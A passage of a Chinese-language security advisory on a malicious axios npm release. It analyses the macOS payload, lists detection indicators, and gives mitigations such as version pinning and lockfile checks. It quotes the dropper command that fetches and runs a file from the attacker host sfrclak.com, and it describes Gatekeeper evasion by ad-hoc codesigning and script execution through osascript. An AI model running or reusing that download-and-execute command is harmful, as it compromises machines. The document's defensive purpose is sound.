leaf="">路径，随后赋权并触发执行。</span></span></span></span></span></p><div data-mpa-md-key="blockquote" style="margin-bottom: 16px;margin-top: 16px;" data-mpa-md-template="30004"><div style="width: 100%;" data-mid=""><div style="background: #F4F4F4;width: 100%;padding: 16px;border-left: 2.5px solid #d03739;" data-mid=""><p data-mpa-md-content="t" style="font-size: 16px;color: rgb(51, 51, 51);text-align: justify;" data-mid="" data-mpa-md-action-id="mneialt11ent"><span style="" mpa-font-style="mnehtv5w1ywa"><span style=""><span lang="EN-US"><span leaf="">curl </span></span><span lang="EN-US"><span leaf="">-o </span></span><span lang="EN-US"><span leaf="">&#34;/Library/Caches/com.apple.act.mond&#34;</span></span><span lang="EN-US"><span leaf="">-d</span></span><span lang="EN-US"><span leaf="">&#34;packages.npm.org/product0&#34;</span></span><span lang="EN-US"><span leaf="">-s</span></span><span lang="EN-US"><span leaf=""><a href="http://sfrclak.com:8000/6202033" target="_blank">http://sfrclak.com:8000/6202033</a> </span></span><span lang="EN-US"><span leaf="">\</span></span><span lang="EN-US"><span leaf=""><br/></span><span leaf="">&amp;&amp;</span><span leaf="">chmod</span><span leaf=""> 770 </span><span leaf="">&#34;/Library/Caches/com.apple.act.mond&#34;</span><span leaf="">\</span><span leaf=""><br/></span><span leaf="">&amp;&amp;</span><span leaf="">/bin/zsh</span><span leaf="">-c</span><span leaf="">&#34;/Library/Caches/com.apple.act.mond </span><span leaf="">\&#34;</span><span leaf="">packages.npm.org/product0</span><span leaf="">\&#34;</span><span leaf="">&#34;</span><span leaf="">\</span><span leaf=""><br/></span><span leaf="">&gt;</span><span leaf=""> /dev/null </span><span leaf="">2</span><span leaf="">&gt;&amp;</span><span leaf="">1</span><span leaf="">&amp;</span></span></span></span></p></div></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt2p3a"><span mpa-font-style="mnehtv5w10h9" style=""><span style=""><span style=""><b><span lang="EN-US" style=""><span leaf="">要点</span></span></b></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">：</span></span></span></span></span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span mpa-font-style="mnehtv5w1q19" style=""><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">载荷落地于</span></span><span lang="EN-US"><span leaf=""> ~/ </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">之外的系统缓存目录（</span></span><span lang="EN-US"><span leaf="">/Library/Caches</span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">），更贴近</span></span><span lang="EN-US"><span leaf="">“</span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">系统组件</span></span><span lang="EN-US"><span leaf="">”</span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">伪装。</span></span></span></span></span></p></li></ul><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span mpa-font-style="mnehtv5wc78" style=""><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">输出重定向到</span></span><span lang="EN-US"><span leaf=""> /dev/null </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">并后台运行，降低可见性。</span></span></span></span></span></p></li></ul><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt21fwg"><span mpa-font-style="mnehtv5wg4r" style=""><span style=""><span style=""><span style=""><span lang="EN-US" style=""><span leaf=""><span textstyle="" style="font-weight: bold;">3.6.2 与</span></span></span><span lang="EN-US"><span leaf=""><span textstyle="" style="font-weight: bold;"> Windows/Linux </span></span></span></span></span></span><span style=""><span lang="EN-US" style=""><span leaf=""><span textstyle="" style="font-weight: bold;">载荷的关键差异</span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mneialt2epc"><span mpa-font-style="mnehtv5w1fpw" style=""><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">样本整体功能与</span></span><span lang="EN-US"><span leaf=""> Windows PowerShell / Linux Python </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">版本基本一致，但在两类指令处理上体现出</span></span><span lang="EN-US"><span leaf=""> macOS </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">平台特性：</span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt2k06"><span mpa-font-style="mnehtv5w22dq" style=""><span style=""><span style=""><span lang="EN-US" style=""><span style=""><span leaf="">1)</span></span></span><b><span lang="EN-US"><span leaf="">peinject </span></span></b></span></span><span style=""><span style=""><b><span lang="EN-US" style=""><span leaf="">指令处理差异（</span></span><span lang="EN-US"><span leaf="">Gatekeeper </span></span></b></span></span><span style=""><span style=""><b><span lang="EN-US" style=""><span leaf="">绕过）</span></span></b></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">：收到</span></span><span lang="EN-US"><span leaf=""> peinject </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">指令后，会在</span></span><span lang="EN-US"><span leaf=""> /private/tmp/ </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">写入随机文件名的临时可执行文件，写入</span></span><span lang="EN-US"><span leaf=""> C2 </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">下发的</span></span><span lang="EN-US"><span leaf=""> shellcode</span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">，并通过</span></span><span lang="EN-US"><span leaf=""> codesign --force --deep --sign - </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">进行签名处理，以提高执行成功率并规避部分</span></span><span lang="EN-US"><span leaf=""> Gatekeeper </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">校验路径。</span></span></span></span></span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-align: center;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span lang="EN-US" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" alt="macOS peinject与codesign绕过" class="rich_pages wxw-img" data-ratio="1.0728476821192052" data-type="png" data-w="604" height="468" style="background-color: transparent;" width="436" data-imgfileid="100024404" src="https://wechat2rss.xlab.app/img-proxy/?k=d64f4959&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKBXlpjSbbXb45xMp5uh4JIC1YL3WVADH3qb8oZOvJib9QvjPy3vnRc5BfVCQm5TR7mQvcp8HRQ71JMaXsft1Ce0t4k62zkoo8E%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt220dj"><span mpa-font-style="mnehtv5w30j" style=""><span style=""><span style=""><span lang="EN-US" style=""><span style=""><span leaf="">2)</span></span></span><b><span lang="EN-US"><span leaf="">runscript </span></span></b></span></span><span style=""><span style=""><b><span lang="EN-US" style=""><span leaf="">指令处理差异（</span></span><span lang="EN-US"><span leaf="">osascript </span></span></b></span></span><span style=""><span style=""><b><span lang="EN-US" style=""><span leaf="">执行）</span></span></b></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">：收到</span></span><span lang="EN-US"><span leaf=""> runscript </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">指令后，会创建形如</span></span><span lang="EN-US"><span leaf=""> /tmp/.XXXXXX.scpt </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">的临时脚本文件，并使用</span></span><span lang="EN-US"><span leaf=""> /usr/bin/osascript </span></span></span></span><span style=""><span style="" data-remoteid="" data-asynid="" src="https://mmbiz.qpic.cn/mmbiz_png/Emmib7pWXrXJWbosa3E46ichHSWrsk6C5KSGKlgG293bf06WpnKKhMUmSt4iaiabx2I5zupOzSQ56E0fqbTO8uCco9t7f8c7pdKqfTpcYWmIu3k/0?wx_fmt=png&amp;from=appmsg" data-src="" align="" alt="macOS runscript与osascript执行" border="" class="rich_pages wxw-img" data-ratio="" data-s="" data-type="png" data-w="" aria-label="" aria-braillelabel="" aria-description="" height="160" hspace="" ismap="" opacity="" sizes="" title="" type="" usemap="" vspace="" width="436" data-width="" data-height="" data-croporisrc="" data-cropx1="" data-cropx2="" data-cropy1="" data-cropy2="" data-cropselx1="" data-cropselx2="" data-cropsely1="" data-cropsely2="" data-backw="" data-backh="" data-copyright="" data-oversubscription-url="" data-before-oversubscription-url="" data-galleryid="" data-gallerysupplier="" data-cardimg="" data-fileid="" data-imgfileid="100024402" data-positionback="" data-imgqrcoded="" data-imgid="" data-upload="" data-fromlib="" data-aiimageid="" data-aiimagesource="" data-cacheurl="" data-aistatus="1" data-retry=""><span lang="EN-US" style=""><span leaf="">执行</span></span><span lang="EN-US"><span leaf=""> AppleScript </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">内容。</span></span></span></span></span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-align: center;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span lang="EN-US" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" alt="macOS runscript与osascript执行" class="rich_pages wxw-img" data-ratio="0.3658823529411765" data-type="png" data-w="850" height="160" style="background-color: transparent;" width="436" data-imgfileid="100024405" src="https://wechat2rss.xlab.app/img-proxy/?k=70a63f81&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJH0ebx9o0BoaIRNMfegYGLNFBSOiaicN4ibSrKUuM0O10qkS1a0RSH1h37K6lYQbjZt9zNzf6ZomYuZPocxibXjcaE12oqURw9crI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt3k3r"><span mpa-font-style="mnehtv5w20s8" style=""><span style=""><span lang="EN-US" style=""><span leaf=""><span textstyle="" style="font-weight: bold;">3.6.3 检测与响应</span></span></span></span><span style=""><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">方式</span></span></span></span></span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span mpa-font-style="mnehtv5w1k1" style=""><span style=""><span style=""><b><span lang="EN-US" style=""><span leaf="">网络侧</span></span></b></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">：</span></span></span></span></span></p></li></ul><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt3223p"><span mpa-font-style="mnehtv5w1r98" style=""><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">关注对</span></span><span lang="EN-US"><span leaf=""> sfrclak.com:8000 </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">的</span></span><span lang="EN-US"><span leaf=""> POST </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">出站通信与周期性</span></span><span lang="EN-US"><span leaf=""> beacon</span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">（与其他平台一致）。</span></span></span></span></span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span mpa-font-style="mnehtv5w1h69" style=""><span style=""><span style=""><b><span lang="EN-US" style=""><span leaf="">主机侧</span></span></b></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">：</span></span></span></span></span></p></li></ul><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt317kl"><span mpa-font-style="mnehtv5w9uy" style=""><span style=""><span style=""><span lang="EN-US" style=""><span style=""><span leaf="">–</span></span></span><span lang="EN-US"><span leaf="">/Library/Caches/com.apple.act.mond</span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">的创建、权限变更（</span></span><span lang="EN-US"><span leaf="">chmod</span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">）与执行（</span></span><span lang="EN-US"><span leaf="">zsh -c</span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">）；</span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt3s0n"><span mpa-font-style="mnehtv5w1lf8" style=""><span style=""><span style=""><span lang="EN-US" style=""><span style=""><span leaf="">–</span></span></span><span lang="EN-US"><span leaf="">/private/tmp/ </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">下随机文件名的短时可执行文件（配合</span></span><span lang="EN-US"><span leaf=""> codesign </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">命令调用）；</span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt31yr6"><span mpa-font-style="mnehtv5w2ub" style=""><span style=""><span style=""><span lang="EN-US" style=""><span style=""><span leaf="">–</span></span></span><span lang="EN-US"><span leaf="">/tmp/.XXXXXX.scpt </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">与</span></span><span lang="EN-US"><span leaf=""> /usr/bin/osascript </span></span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="" mpa-font-style="mnehtv5w1yw1" style="">的异常调用链。</span></span></span></span></p><div data-mpa-md-key="heading-1" style="margin-bottom: 16px;margin-top: 16px;"><div style="width: 100%;display: flex;justify-content: center;align-items: center;justify-content: flex-start;" data-mid=""><div style="text-align: left;" data-mid=""><p data-mpa-md-content="t" style="font-size: 18px;color: rgb(51, 51, 51);font-weight: bold;letter-spacing: 1px;text-align: left;" data-mid="" data-mpa-md-action-id="mneialt312f0"><span style=""><span style="font-variant: normal;text-transform: none;" lang="EN-US"><span leaf="">四、影响评估</span></span></span></p></div></div></div><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span mpa-font-style="mneec5rg1lgc" style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">受影响范围</span></span></span><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：直接/间接依赖 axios@^1.14.0 或 axios@^0.30.0 的所有项目（包括 CI/CD 流水线、构建服务器与开发机）。</span></span></span></span></p></li></ul><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span mpa-font-style="mneec5rgp4v" style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">潜在后果</span></span></span><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：系统信息窃取、凭证泄露、远程命令执行、跨平台持久化后门、进一步横向移动。</span></span></span></span></p></li></ul><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span mpa-font-style="mneec5rg1z8k" style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">当前状态</span></span></span><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：恶意版本已被 npm 下架，但</span></span></span><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">已安装环境需视为已失陷</span></span></span><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">并按入侵处置流程处理。</span></span></span></span></p></li></ul><div data-mpa-md-key="heading-1" style="margin-bottom: 16px;margin-top: 16px;"><div style="width: 100%;display: flex;justify-content: center;align-items: center;justify-content: flex-start;" data-mid=""><div style="text-align: left;" data-mid=""><p data-mpa-md-content="t" style="font-size: 18px;color: rgb(51, 51, 51);font-weight: bold;letter-spacing: 1px;text-align: left;" data-mid="" data-mpa-md-action-id="mneialt4w0c"><span style=""><span style="font-variant: normal;text-transform: none;" lang="EN-US"><span leaf="">五、缓解措施</span></span></span></p></div></div></div><div data-mpa-md-key="heading-2" style="display: flex;"><div style="display:flex;align-items:flex-start;"><p data-mpa-md-content="t" style="font-weight: 600;font-size: 17px;color: rgb(37, 37, 37);line-height: 28px;flex: 1 1 0%;text-align: left;" data-mpa-md-action-id="mneialt416dj"><span mpa-font-style="mneec5rg756" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;" lang="EN-US"><span leaf=""><span textstyle="" style="color: rgb(190, 25, 31);">5.1 </span></span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><span textstyle="" style="color: rgb(190, 25, 31);">优先针对开发项目进行版本锁定</span></span></span></span></span></span></p></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mneialt41hxc"><span style="" mpa-font-style="mneec5rg1fae"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">在 package.json 中将 Axios 固定为已知安全版本，并强制覆盖所有传递依赖：</span></span></span></span></p><div data-mpa-md-key="blockquote" style="margin-bottom: 16px;margin-top: 16px;" data-mpa-md-template="30004"><div style="width: 100%;" data-mid=""><div style="background: #F4F4F4;width: 100%;padding: 16px;border-left: 2.5px solid #d03739;" data-mid=""><p data-mpa-md-content="t" style="font-size: 16px;color: rgb(51, 51, 51);text-align: justify;" data-mid="" data-mpa-md-action-id="mneialt56qb"><span style="" mpa-font-style="mneec5rgwca"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><br/></span></span></span></span><span mpa-font-style="mneec5rg19st" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#34;dependencies&#34;</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">:</span></span></span></span></span><span style="" mpa-font-style="mneec5rg77m"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><br/></span></span></span></span><span mpa-font-style="mneec5rg6vx" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#34;axios&#34;</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">:</span></span></span></span></span><span style="" mpa-font-style="mneec5rg1c6i"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#34;1.14.0&#34;</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><br/></span></span></span></span><span style="" mpa-font-style="mneec5rgvo5"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">},</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><br/></span></span></span></span><span mpa-font-style="mneec5rgl2n" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#34;overrides&#34;</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">:</span></span></span></span></span><span style="" mpa-font-style="mneec5rgkpi"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><br/></span></span></span></span><span mpa-font-style="mneec5rg11nk" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#34;axios&#34;</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">:</span></span></span></span></span><span style="" mpa-font-style="mneec5rg1759"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#34;1.14.0&#34;</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><br/></span></span></span></span><span style="" mpa-font-style="mneec5rg1q6t"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><br/></span></span></span></span><span style="" mpa-font-style="mneec5rg1gxw"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span></span></p></div></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt51yws"><span mpa-font-style="mneec5rg161x" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">•</span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">Yarn 用户可使用 resolutions 字段；pnpm 用户可使用 overrides 字段。</span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt51xr"><span mpa-font-style="mneec5rg21dy" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">•</span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">提交 package-lock.json 并使用 npm ci 确保构建一致性。</span></span></span></span></span></p><div data-mpa-md-key="heading-2" style="display: flex;"><div style="display:flex;align-items:flex-start;"><p data-mpa-md-content="t" style="font-weight: 600;font-size: 17px;color: rgb(37, 37, 37);line-height: 28px;flex: 1 1 0%;text-align: left;" data-mpa-md-action-id="mneialt51h99"><span mpa-font-style="mneec5rg1auh" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;" lang="EN-US"><span leaf=""><span textstyle="" style="color: rgb(190, 25, 31);">5.2 </span></span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><span textstyle="" style="color: rgb(190, 25, 31);">针对疑似中招环境进行审计与</span></span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><span textstyle="" style="color: rgb(190, 25, 31);">IOC 检测</span></span></span></span></span></span></p></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt5151f"><span style="" mpa-font-style="mneec5rg1j3"><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">（1）依赖版本与锁文件检查</span></span></span></span></p><div data-mpa-md-key="blockquote" style="margin-bottom: 16px;margin-top: 16px;" data-mpa-md-template="30004"><div style="width: 100%;" data-mid=""><div style="background: #F4F4F4;width: 100%;padding: 16px;border-left: 2.5px solid #d03739;" data-mid=""><p data-mpa-md-content="t" style="font-size: 16px;color: rgb(51, 51, 51);text-align: justify;" data-mid="" data-mpa-md-action-id="mneialt62iw"><span style="" mpa-font-style="mneec5rg1e2u"><span style=""><span style="font-style: italic;font-variant: normal;text-transform: none;"><span leaf="">检查当前安装的 axios 和 plain-crypto-js 版本</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><br/></span></span></span></span><span mpa-font-style="mneec5rgvlq" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">npm</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""> ls axios plain-crypto-js </span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">--all</span></span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><br/></span></span></span></span><span style="" mpa-font-style="mneec5rg1rqb"><span style=""><span style="font-style: italic;font-variant: normal;text-transform: none;"><span leaf="">全面搜索锁文件中的恶意版本</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><br/></span></span></span></span><span style="" mpa-font-style="mneec5rgkv6"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">grep </span></span></span></span><span style="" mpa-font-style="mneec5rgo8n"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">-E </span></span></span></span><span style="" mpa-font-style="mneec5rg945"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#39;axios@(1\.14\.1|0\.30\.4)|plain-crypto-js@4\.2\.1&#39;</span></span></span></span><span style="" mpa-font-style="mneec5rg19a0"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">\</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><br/></span></span></span></span><span mpa-font-style="mneec5rgdmy" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">package-lock.json yarn.lock pnpm-lock.yaml </span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">2</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">/dev/null </span></span></span></span><span style=""><span style=""><span style="font-weight: bold;font-variant: normal;text-transform: none;"><span leaf="">||</span></span></span></span></span><span style="" mpa-font-style="mneec5rgajc"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">true</span></span></span></span></p></div></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt61twi"><span style="" mpa-font-style="mneec5rguuo"><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">（2）node_modules 目录扫描</span></span></span></span></p><div data-mpa-md-key="blockquote" style="margin-bottom: 16px;margin-top: 16px;" data-mpa-md-template="30004"><div style="width: 100%;" data-mid=""><div style="background: #F4F4F4;width: 100%;padding: 16px;border-left: 2.5px solid #d03739;" data-mid=""><p data-mpa-md-content="t" style="font-size: 16px;color: rgb(51, 51, 51);text-align: justify;" data-mid="" data-mpa-md-action-id="mneialt62qd"><span mpa-font-style="mneec5rg1zjn" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">find</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""> . </span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">-path</span></span></span></span></span><span style="" mpa-font-style="mneec5rg129r"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#39;*/node_modules/plain-crypto-js&#39;</span></span></span></span><span mpa-font-style="mneec5rgbuj" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">-type</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""> d </span></span></span></span><span style=""><span 